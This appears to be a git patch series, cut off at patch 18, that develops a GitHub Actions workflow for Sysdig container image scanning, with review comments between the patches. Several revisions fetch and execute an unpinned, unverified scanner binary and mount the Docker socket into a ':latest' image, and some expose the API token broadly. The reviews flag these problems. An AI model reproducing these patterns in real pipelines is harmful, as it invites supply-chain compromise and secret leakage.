From 2083638a0a3ac0dd0bf68017ca6f405987bfb2e4 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 00:26:47 +0900 Subject: [PATCH 01/73] Add Sysdig CLI scan workflow --- .github/workflows/scan.yml | 1 + 1 file changed, 1 insertion(+) create mode 100644 .github/workflows/scan.yml diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml new file mode 100644 index 0000000000..1becba2bb0 --- /dev/null +++ b/.github/workflows/scan.yml @@ -0,0 +1 @@ +404: Not Found \ No newline at end of file From ea50a2a7da215677cc3d53fe5c0300b3b6512ec1 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 00:31:59 +0900 Subject: [PATCH 02/73] Fix: corrected scan.yml quoting for GitHub Actions --- .github/workflows/scan.yml | 36 +++++++++++++++++++++++++++++++++++- 1 file changed, 35 insertions(+), 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 1becba2bb0..0fcc1cedac 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1 +1,35 @@ -404: Not Found \ No newline at end of file +name: Sysdig Image Scan + +on: + push: + branches: + - main + workflow_dispatch: + +jobs: + image-scan: + runs-on: ubuntu-latest + + steps: + - name: Checkout code + uses: actions/checkout@v3 + + - name: Build Docker images + run: | + docker build -t voting-app ./voting-app + docker build -t worker ./worker + docker build -t result ./result + + - name: Download Sysdig CLI Scanner + run: | + curl -sL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/linux/sysdig-cli-scanner -o scanner + chmod +x scanner + + - name: Run Sysdig Scan on voting-app + run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image voting-app + + - name: Run Sysdig Scan on worker + run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image worker + + - name: Run Sysdig Scan on result + run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image result 
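Review bot: The only content of the newly created `.github/workflows/scan.yml` is the line `404: Not Found`, an HTTP error body rather than a workflow, so the file as committed has neither `on:` nor `jobs:` and cannot be accepted as a workflow. It looks like the file was written from a failed fetch; checking how it was produced is worth doing before the next revision simply overwrites it.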
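Review bot: The three scan steps expand `${{ secrets.SYSDIG_SECURE_TOKEN }}` directly into the `run:` command text, so the token is substituted into the shell script before bash parses it; pass it through the step's own `env:` (`SYSDIG_SECURE_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }}`) and reference it as `--token "$SYSDIG_SECURE_TOKEN"` so the shell only ever sees a variable. The download step fetches an unpinned `latest` binary with `curl -sL … -o scanner` and no `-f`, so an HTTP error page is saved as `scanner` with exit status 0 (plausibly how the `404: Not Found` file in patch 01 came about), and nothing checks the binary's integrity; use `curl -fsSL`, pin a version, and compare the file against the vendor-published checksum before `chmod +x`. The same unverified download recurs in patches 04, 05, 06, 08, 09, 10 and 11, and the inline secret expression returns in patches 22 and 23. The workflow also has no `permissions:` block, so the job's `GITHUB_TOKEN` gets the repository default instead of the `contents: read` this job needs, and `actions/checkout@v3` is a mutable tag rather than a commit SHA.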
From 6d6c40a2d41354a7df0ba4b195d9eba7f6795601 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 00:42:50 +0900 Subject: [PATCH 03/73] fix: correct voting-app Docker path to ./vote --- .github/workflows/scan.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 0fcc1cedac..2acc033de1 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -16,7 +16,7 @@ jobs: - name: Build Docker images run: | - docker build -t voting-app ./voting-app + docker build -t voting-app ./vote docker build -t worker ./worker docker build -t result ./result From c1b03dfe0b435907d2d4f2747f43bbe1084fc32a Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 00:47:21 +0900 Subject: [PATCH 04/73] fix: correct CLI scanner download URL --- .github/workflows/scan.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 2acc033de1..cda8091330 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -22,7 +22,7 @@ jobs: - name: Download Sysdig CLI Scanner run: | - curl -sL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/linux/sysdig-cli-scanner -o scanner + curl -sLo scanner https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/sysdig-cli-scanner-linux-amd64 chmod +x scanner - name: Run Sysdig Scan on voting-app From d15504ce05f5c583142a83c7919905f87e068389 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 00:56:37 +0900 Subject: [PATCH 05/73] trigger scan --- .github/workflows/scan.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index cda8091330..5a74d142b3 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml 
@@ -22,7 +22,7 @@ jobs: - name: Download Sysdig CLI Scanner run: | - curl -sLo scanner https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/sysdig-cli-scanner-linux-amd64 + curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/sysdig-cli-scanner-linux-amd64 -o scanner chmod +x scanner - name: Run Sysdig Scan on voting-app From e2f6459b51d04a5230a1a435257d1421743e56f7 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:02:34 +0900 Subject: [PATCH 06/73] correct scan.yml --- .github/workflows/scan.yml | 23 +++++++++++------------ 1 file changed, 11 insertions(+), 12 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 5a74d142b3..b56bdbec81 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -2,8 +2,7 @@ name: Sysdig Image Scan on: push: - branches: - - main + branches: [main] workflow_dispatch: jobs: @@ -11,8 +10,7 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout code - uses: actions/checkout@v3 + - uses: actions/checkout@v3 - name: Build Docker images run: | 
@@ -22,14 +20,15 @@ jobs: - name: Download Sysdig CLI Scanner run: | - curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/sysdig-cli-scanner-linux-amd64 -o scanner + curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -L -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" -o scanner chmod +x scanner - - name: Run Sysdig Scan on voting-app - run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image voting-app - - - name: Run Sysdig Scan on worker - run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image worker + - name: Run Sysdig Scan + env: + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + SYS_DIG_SECURE_URL: https://app.au1.sysdig.com + run: | + ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://voting-app + ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://worker + ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://result - - name: Run Sysdig Scan on result - run: ./scanner --token ${{ secrets.SYSDIG_SECURE_TOKEN }} --image result From bc413297fb4fc7df5a62edde64b6efac98fcad3f Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:06:08 +0900 Subject: [PATCH 07/73] correctCLIversion scan.yml --- .github/workflows/scan.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index b56bdbec81..e2230a5e2e 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml 
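Review bot: The new download line builds the URL from a nested `$(curl -L -s …latest_version.txt)` whose exit status is discarded: if that request fails or returns an empty body, the outer `curl` (still without `-f`) fetches `…/sysdig-cli-scanner//linux/amd64/…`, stores whatever error page comes back as `scanner`, and the step proceeds to `chmod +x`. GitHub's default bash for `run:` is `-eo pipefail` but not `-u`, so none of this stops the step. Read the version into a variable first and refuse to continue when it is empty, e.g. `version=$(curl -fsSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)` followed by `[ -n "$version" ] || { echo "could not resolve scanner version" >&2; exit 1; }`, then download with `curl -fsSL`. The same unchecked substitution survives in patches 08, 09, 10 and 11 after it is moved into `LATEST_VERSION`/`VERSION`.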
@@ -28,7 +28,7 @@ jobs: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} SYS_DIG_SECURE_URL: https://app.au1.sysdig.com run: | - ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://voting-app - ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://worker - ./scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://result + ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://voting-app + ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://worker + ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://result From ad83a35153a2eac2d24275b7c2b92374602443d6 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:23:19 +0900 Subject: [PATCH 08/73] Add Sysdig image scan workflow --- .github/workflows/scan.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index e2230a5e2e..0f5b65cea0 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -10,7 +10,8 @@ jobs: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - name: Checkout source + uses: actions/checkout@v3 - name: Build Docker images run: | @@ -20,10 +21,10 @@ jobs: - name: Download Sysdig CLI Scanner run: | - curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -L -s https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" -o scanner + curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" -o scanner chmod +x scanner - - name: Run Sysdig Scan + - name: Run Sysdig Image Scan env: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} SYS_DIG_SECURE_URL: https://app.au1.sysdig.com From 3729c8d3d90b4ef23f031a0240422bf62848bf8b Mon Sep 17 00:00:00 2001 
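Review bot: `--token` becomes `--auth-token` here, flips back to `--token` in patch 12 and then to `--client-token` in patches 15 and 17, all while the binary is whatever `latest` resolves to at run time, so the flag the workflow needs can change underneath it between runs. Pin the scanner version in the download step and take the flag name from that version's `--help` output, recording the decision in a comment above the step (`# flag names verified against sysdig-cli-scanner <VERSION>`, with the pinned version filled in).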
From: keitahigaki Date: Wed, 16 Jul 2025 01:27:31 +0900 Subject: [PATCH 09/73] Add Sysdig image scan workflow --- .github/workflows/scan.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 0f5b65cea0..0b84536ed2 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -21,9 +21,10 @@ jobs: - name: Download Sysdig CLI Scanner run: | - curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt)/linux/amd64/sysdig-cli-scanner" -o scanner - chmod +x scanner - + LATEST_VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt) + curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${LATEST_VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner + chmod +x sysdig-cli-scanner + ./sysdig-cli-scanner version - name: Run Sysdig Image Scan env: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} From 291018b90b45136909e1f39f2a6226ec7571a1c2 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:32:14 +0900 Subject: [PATCH 10/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 0b84536ed2..e754d92dc5 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml 
@@ -20,11 +20,12 @@ jobs: docker build -t result ./result - name: Download Sysdig CLI Scanner - run: | - LATEST_VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt) - curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${LATEST_VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner - chmod +x sysdig-cli-scanner - ./sysdig-cli-scanner version + run: | +     version=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt) +    echo "Latest version is $version" +    curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${version}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner +    chmod +x sysdig-cli-scanner +    ./sysdig-cli-scanner --version - name: Run Sysdig Image Scan env: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} From ffecc38b1055ef4bdf15d4f808b65f39eac00587 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:34:27 +0900 Subject: [PATCH 11/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 24 +++++++++++++----------- 1 file changed, 13 insertions(+), 11 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index e754d92dc5..35085b7439 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout source + - name: Checkout code uses: actions/checkout@v3 - name: Build Docker images 
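Review bot: The leading whitespace on the five added lines under `run: |` appears to contain non-breaking spaces rather than ordinary spaces (it renders differently from the surrounding context lines). YAML does not treat U+00A0 as indentation, so those characters become part of the block scalar and bash then sees each command prefixed with a non-space byte sequence, which typically fails with `command not found`. Retype the indentation with plain spaces; a `yamllint` step in CI would catch this class of error before it reaches a runner.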
@@ -20,18 +20,20 @@ jobs: docker build -t result ./result - name: Download Sysdig CLI Scanner - run: | -     version=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt) -    echo "Latest version is $version" -    curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${version}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner -    chmod +x sysdig-cli-scanner -    ./sysdig-cli-scanner --version - - name: Run Sysdig Image Scan + run: | + echo "Fetching latest scanner version..." + VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt) + echo "Latest version: $VERSION" + curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner + chmod +x sysdig-cli-scanner + ./sysdig-cli-scanner --version + + - name: Run Sysdig Scan env: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} SYS_DIG_SECURE_URL: https://app.au1.sysdig.com run: | - ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://voting-app - ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://worker - ./scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://result + ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://voting-app + ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://worker + ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://result From 33dd48344b319a35da619e60ad5f333cafd4f3a9 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:38:44 +0900 Subject: [PATCH 12/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 11 +++++------ 1 file changed, 5 insertions(+), 6 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 35085b7439..f8849627d0 100644 --- a/.github/workflows/scan.yml 
+++ b/.github/workflows/scan.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout code + - name: Checkout source uses: actions/checkout@v3 - name: Build Docker images @@ -21,19 +21,18 @@ jobs: - name: Download Sysdig CLI Scanner run: | - echo "Fetching latest scanner version..." VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt) echo "Latest version: $VERSION" curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner chmod +x sysdig-cli-scanner ./sysdig-cli-scanner --version - - name: Run Sysdig Scan + - name: Run Sysdig CLI Scanner env: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} SYS_DIG_SECURE_URL: https://app.au1.sysdig.com run: | - ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://voting-app - ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://worker - ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --auth-token $SECURE_API_TOKEN docker://result + ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://voting-app + ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://worker + ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://result From 35949369af0f35175470a1b6e7d62f22d732eea4 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:46:36 +0900 Subject: [PATCH 13/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 40 +++++++++++++++++++++++--------------- 1 file changed, 24 insertions(+), 16 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index f8849627d0..fdb7c52d30 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1,4 +1,4 @@ -name: Sysdig Image Scan +name: Sysdig Container Scanner (Stable) on: push: 
@@ -6,11 +6,11 @@ on: workflow_dispatch: jobs: - image-scan: + scan: runs-on: ubuntu-latest steps: - - name: Checkout source + - name: Checkout uses: actions/checkout@v3 - name: Build Docker images @@ -19,20 +19,28 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Download Sysdig CLI Scanner - run: | - VERSION=$(curl -sSL https://download.sysdig.com/scanning/sysdig-cli-scanner/latest_version.txt) - echo "Latest version: $VERSION" - curl -sSL "https://download.sysdig.com/scanning/bin/sysdig-cli-scanner/${VERSION}/linux/amd64/sysdig-cli-scanner" -o sysdig-cli-scanner - chmod +x sysdig-cli-scanner - ./sysdig-cli-scanner --version - - - name: Run Sysdig CLI Scanner + - name: Run Sysdig CLI Scanner (Dockerized) env: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - SYS_DIG_SECURE_URL: https://app.au1.sysdig.com run: | - ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://voting-app - ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://worker - ./sysdig-cli-scanner --apiurl $SYS_DIG_SECURE_URL --token $SECURE_API_TOKEN docker://result + docker run --rm \ + -v /var/run/docker.sock:/var/run/docker.sock \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl https://app.au1.sysdig.com \ + --token $SECURE_API_TOKEN \ + docker://voting-app + + docker run --rm \ + -v /var/run/docker.sock:/var/run/docker.sock \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl https://app.au1.sysdig.com \ + --token $SECURE_API_TOKEN \ + docker://worker + + docker run --rm \ + -v /var/run/docker.sock:/var/run/docker.sock \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl https://app.au1.sysdig.com \ + --token $SECURE_API_TOKEN \ + docker://result From 591531824ad6e10cf4e66cc3211c585d08e5fea9 Mon Sep 17 00:00:00 2001 
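Review bot: The three new `docker run` invocations mount `/var/run/docker.sock` into `quay.io/sysdig/sysdig-cli-scanner:latest`, which hands a mutable, unverified image full control of the runner's Docker daemon and with it the checked-out tree, the built images and the token passed on its command line. Pin the scanner image by digest (`quay.io/sysdig/sysdig-cli-scanner:<TAG>@sha256:<DIGEST>`, both values taken from the vendor's registry) so a retagged image cannot silently change what runs with that access, and if the scanner can read an exported image (`docker save` to a tar plus an archive-style source) the socket mount can be dropped entirely. The socket mount and `:latest` tag are carried through patches 14–19; patch 20 pins `1.22.4` by tag but still not by digest. Quoting `"$SECURE_API_TOKEN"` would also keep a token containing shell metacharacters from being word-split.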
From: keitahigaki Date: Wed, 16 Jul 2025 01:49:22 +0900 Subject: [PATCH 14/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 23 ++++++++++++----------- 1 file changed, 12 insertions(+), 11 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index fdb7c52d30..32b191a7e9 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -1,4 +1,4 @@ -name: Sysdig Container Scanner (Stable) +name: Sysdig Image Scan on: push: @@ -21,26 +21,27 @@ jobs: - name: Run Sysdig CLI Scanner (Dockerized) env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + SYSDIG_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + SYSDIG_API_URL: https://app.au1.sysdig.com run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - --apiurl https://app.au1.sysdig.com \ - --token $SECURE_API_TOKEN \ + -e SYSDIG_API_TOKEN \ + -e SYSDIG_API_URL \ + quay.io/sysdig/sysdig-cli-scanner \ docker://voting-app docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - --apiurl https://app.au1.sysdig.com \ - --token $SECURE_API_TOKEN \ + -e SYSDIG_API_TOKEN \ + -e SYSDIG_API_URL \ + quay.io/sysdig/sysdig-cli-scanner \ docker://worker docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - quay.io/sysdig/sysdig-cli-scanner:latest \ - --apiurl https://app.au1.sysdig.com \ - --token $SECURE_API_TOKEN \ + -e SYSDIG_API_TOKEN \ + -e SYSDIG_API_URL \ + quay.io/sysdig/sysdig-cli-scanner \ docker://result From a0453311300df6189267d376b6a052d1ef5ce497 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:52:00 +0900 Subject: [PATCH 15/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 25 ++++++++++++------------- 1 file changed, 12 insertions(+), 13 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 32b191a7e9..a9dc4a134f 100644 
--- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest steps: - - name: Checkout + - name: Checkout code uses: actions/checkout@v3 - name: Build Docker images @@ -19,29 +19,28 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig CLI Scanner (Dockerized) + - name: Run Sysdig CLI Scanner (with CLI flags) env: - SYSDIG_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} - SYSDIG_API_URL: https://app.au1.sysdig.com + SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SYSDIG_API_TOKEN \ - -e SYSDIG_API_URL \ - quay.io/sysdig/sysdig-cli-scanner \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl https://app.au1.sysdig.com \ + --client-token $SECURE_API_TOKEN \ docker://voting-app docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SYSDIG_API_TOKEN \ - -e SYSDIG_API_URL \ - quay.io/sysdig/sysdig-cli-scanner \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl https://app.au1.sysdig.com \ + --client-token $SECURE_API_TOKEN \ docker://worker docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ - -e SYSDIG_API_TOKEN \ - -e SYSDIG_API_URL \ - quay.io/sysdig/sysdig-cli-scanner \ + quay.io/sysdig/sysdig-cli-scanner:latest \ + --apiurl https://app.au1.sysdig.com \ + --client-token $SECURE_API_TOKEN \ docker://result From b94af43c4405945278875f14c142c1832e35b098 Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:55:05 +0900 Subject: [PATCH 16/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index a9dc4a134f..5201e9337e 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml 
@@ -19,7 +19,7 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig CLI Scanner (with CLI flags) + - name: Run Sysdig CLI Scanner (Dockerized) env: SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} run: | @@ -27,20 +27,20 @@ jobs: -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ --apiurl https://app.au1.sysdig.com \ - --client-token $SECURE_API_TOKEN \ + --token $SECURE_API_TOKEN \ docker://voting-app docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ --apiurl https://app.au1.sysdig.com \ - --client-token $SECURE_API_TOKEN \ + --token $SECURE_API_TOKEN \ docker://worker docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ --apiurl https://app.au1.sysdig.com \ - --client-token $SECURE_API_TOKEN \ + --token $SECURE_API_TOKEN \ docker://result From 8fb5b7858e9ae134d4f17379afda48aa353a993c Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 01:58:05 +0900 Subject: [PATCH 17/73] correct Sysdig image scan workflow --- .github/workflows/scan.yml | 36 +++++++++++++++++++++--------------- 1 file changed, 21 insertions(+), 15 deletions(-) diff --git a/.github/workflows/scan.yml b/.github/workflows/scan.yml index 5201e9337e..78d8834ee8 100644 --- a/.github/workflows/scan.yml +++ b/.github/workflows/scan.yml @@ -2,13 +2,17 @@ name: Sysdig Image Scan on: push: - branches: [main] + branches: + - main workflow_dispatch: +env: + SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }} + SYS_DIG_SECURE_URL: https://app.au1.sysdig.com + jobs: - scan: + image-scan: runs-on: ubuntu-latest - steps: - name: Checkout code uses: actions/checkout@v3 
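Review bot: Moving the token into a workflow-level `env:` (`SECURE_API_TOKEN: ${{ secrets.SECURE_API_TOKEN }}`) exposes it to every step of every job, including the checkout and build steps that do not need it; keep the secret on the scan steps' own `env:` and leave only `SYS_DIG_SECURE_URL` at the top. The referenced secret name also changes here from `SYSDIG_SECURE_TOKEN` to `SECURE_API_TOKEN`; if the repository secret was not renamed to match, the expression expands to an empty string and the scanner fails with an opaque authentication error. A one-line guard at the start of each scan step makes that failure explicit: `[ -n "$SECURE_API_TOKEN" ] || { echo "SECURE_API_TOKEN is not set" >&2; exit 1; }`.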
@@ -19,28 +23,30 @@ jobs: docker build -t worker ./worker docker build -t result ./result - - name: Run Sysdig CLI Scanner (Dockerized) - env: - SECURE_API_TOKEN: ${{ secrets.SYSDIG_SECURE_TOKEN }} + - name: Run Sysdig Scan on voting-app run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ - --apiurl https://app.au1.sysdig.com \ - --token $SECURE_API_TOKEN \ - docker://voting-app + scan docker://voting-app \ + --apiurl $SYS_DIG_SECURE_URL \ + --client-token $SECURE_API_TOKEN + - name: Run Sysdig Scan on worker + run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ - --apiurl https://app.au1.sysdig.com \ - --token $SECURE_API_TOKEN \ - docker://worker + scan docker://worker \ + --apiurl $SYS_DIG_SECURE_URL \ + --client-token $SECURE_API_TOKEN + - name: Run Sysdig Scan on result + run: | docker run --rm \ -v /var/run/docker.sock:/var/run/docker.sock \ quay.io/sysdig/sysdig-cli-scanner:latest \ - --apiurl https://app.au1.sysdig.com \ - --token $SECURE_API_TOKEN \ - docker://result + scan docker://result \ + --apiurl $SYS_DIG_SECURE_URL \ + --client-token $SECURE_API_TOKEN From ea473d12851cbdecfedc4aa19e734a5cf7842ceb Mon Sep 17 00:00:00 2001 From: keitahigaki Date: Wed, 16 Jul 2025 02:03:57 +0900 Subject: [PATCH 